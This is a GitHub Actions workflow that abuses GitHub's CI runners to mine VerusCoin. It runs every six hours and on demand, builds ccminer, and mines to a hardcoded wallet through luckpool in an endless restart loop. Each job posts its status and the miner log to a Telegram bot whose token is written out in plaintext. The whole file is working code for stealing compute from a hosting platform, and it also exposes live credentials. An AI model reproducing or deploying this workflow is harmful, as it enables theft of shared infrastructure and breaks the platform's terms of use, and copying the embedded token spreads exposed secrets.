name: VerusCoin Miner (GH Action)

on:
  workflow_dispatch:
  schedule:
    - cron: "0 */6 * * *"

env:
  WALLET: RGVmtuvrP2yX8q3U4up77CcSpkcVhp4bUG
  TELEGRAM_TOKEN: 7548058927:AAF-fL3P6W5sNxbzbmwwtsfVxPZubdIybzc
  TELEGRAM_CHAT_ID: 5763229296

jobs:
  mine:
    runs-on: ubuntu-latest
    timeout-minutes: 350

    steps:
      - name: 🧰 Install dependencies
        run: |
          sudo apt update
          sudo apt install -y \
            build-essential git cmake automake libtool autoconf pkg-config \
            libcurl4-openssl-dev

      - name: ⛏️ Clone & build miner
        run: |
          git clone https://github.com/monkins1010/ccminer.git
          cd ccminer
          chmod +x build.sh
          ./build.sh

      - name: 🚀 Start mining (with auto restart)
        run: |
          echo "Mining started at $(date)"
          echo "Worker: github-${{ github.run_id }}"

          curl -s -X POST https://api.telegram.org/bot${TELEGRAM_TOKEN}/sendMessage \
            -d chat_id=${TELEGRAM_CHAT_ID} \
            -d text="🟢 Mining started on GitHub Actions\n🧱 Wallet: ${WALLET}\n👷 Worker: github-${{ github.run_id }}"

          cd ccminer
          while true; do
            ./ccminer -a verus \
              -o stratum+tcp://na.luckpool.net:3956 \
              -u ${WALLET}.github-${{ github.run_id }} \
              -p x -t 1 | tee miner.log

            curl -s -X POST https://api.telegram.org/bot${TELEGRAM_TOKEN}/sendDocument \
              -F chat_id=${TELEGRAM_CHAT_ID} \
              -F document=@miner.log \
              -F caption="🔁 Miner restarted at $(date)"
          done
